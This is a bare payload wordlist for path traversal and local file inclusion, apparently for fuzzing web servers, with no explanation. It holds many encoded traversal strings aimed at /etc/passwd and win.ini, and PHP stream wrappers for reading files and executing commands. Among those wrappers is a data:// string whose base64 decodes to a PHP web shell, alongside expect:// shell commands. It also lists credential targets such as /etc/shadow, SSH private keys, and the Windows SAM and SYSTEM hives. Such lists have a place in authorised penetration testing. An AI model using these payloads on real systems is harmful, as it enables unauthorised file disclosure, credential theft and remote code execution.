../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
....//....//....//etc//passwd
....//....//....//....//etc//passwd
....//....//....//....//....//etc//passwd
....\\....\\....\\windows\\win.ini
....\\....\\....\\....\\windows\\win.ini
....\\....\\....\\....\\....\\windows\\win.ini
..////....////....////etc////passwd
..\\\\..\\\\..\\\\windows\\\\win.ini
%00../../../../etc/passwd%00
%00../../../windows/win.ini%00
%00/etc/passwd%00
%00C:/windows/win.ini%00
/..\../..\../..\../..\../etc/passwd
\..\..\..\..\windows\win.ini
/././././././etc/passwd
\.\.\.\.\.\.\windows\win.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5cetc%25%5cpasswd
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5cwindows%25%5cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5Cwindows%5Cwin.ini
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%65%74%63%25%32%66%70%61%73%73%77%64
%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%77%69%6e%64%6f%77%73%25%35%63%77%69%6e%2e%69%6e%69
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%65%74%63%25%32%66%70%61%73%73%77%64
%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%77%69%6e%64%6f%77%73%25%35%63%77%69%6e%2e%69%6e%69
%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd
%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd
%E2%80%A5/%E2%80%A5/%E2%80%A5/etc/passwd
%E2%80%A5/%E2%80%A5/%E2%80%A5/%E2%80%A5/etc/passwd
%E2%80%AE%E2%80%AE/%E2%80%AE%E2%80%AE/%E2%80%AE%E2%80%AE/etc/passwd
%E2%80%AE%E2%80%AE/%E2%80%AE%E2%80%AE/%E2%80%AE%E2%80%AE/%E2%80%AE%E2%80%AE/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216windows%u2216win.ini
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afwindows%c0%afwin.ini
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=../etc/passwd
php://filter/read=convert.base64-encode/resource=../../etc/passwd
php://filter/read=convert.base64-encode/resource=C:/windows/win.ini
php://filter/read=convert.base64-encode/resource=../windows/win.ini
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/read=string.toupper/resource=/etc/passwd
php://filter/read=string.tolower/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/zlib.inflate/resource=/etc/passwd
expect://ls
expect://id
expect://whoami
expect://dir
expect://pwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=ls
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id
zip://shell.jpg%23payload.php
phar://shell.jpg/payload.php
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/usr/local/apache/log/access_log
/usr/local/apache2/log/access_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/maillog
/var/log/boot.log
/var/log/cron
/var/log/messages
/var/log/secure
/var/log/auth.log
/var/log/syslog
/var/log/user.log
/var/log/Xorg.0.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/mariadb/mariadb.log
/var/log/postgresql/postgresql-9.3-main.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\Program Files\Apache Software Foundation\Apache2.2\logs\access.log
C:\Program Files\Apache Software Foundation\Apache2.2\logs\error.log
C:\WINDOWS\system32\logfiles\W3SVC1\sc-w3svc1.log
C:\WINNT\system32\logfiles\W3SVC1\sc-w3svc1.log
C:\WINDOWS\system32\config\SysEvent.Evt
C:\WINNT\system32\config\SysEvent.Evt
C:\WINDOWS\system32\winevt\logs\System.evtx
/etc/shadow
/etc/group
/etc/hosts
/etc/resolv.conf
/etc/motd
/etc/issue
/etc/bashrc
/etc/profile
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/id_rsa
/home/user/.ssh/authorized_keys
/etc/mysql/my.cnf
/etc/my.cnf
/etc/php.ini
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/cmdline
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\config\SAM
C:\WINDOWS\system32\config\SYSTEM
C:\WINDOWS\system32\config\SOFTWARE
C:\Documents and Settings\Administrator\Desktop\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Program Files\Apache\conf\httpd.conf
C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf
C:\Program Files (x86)\Apache Software Foundation\Apache2.2\conf\httpd.conf

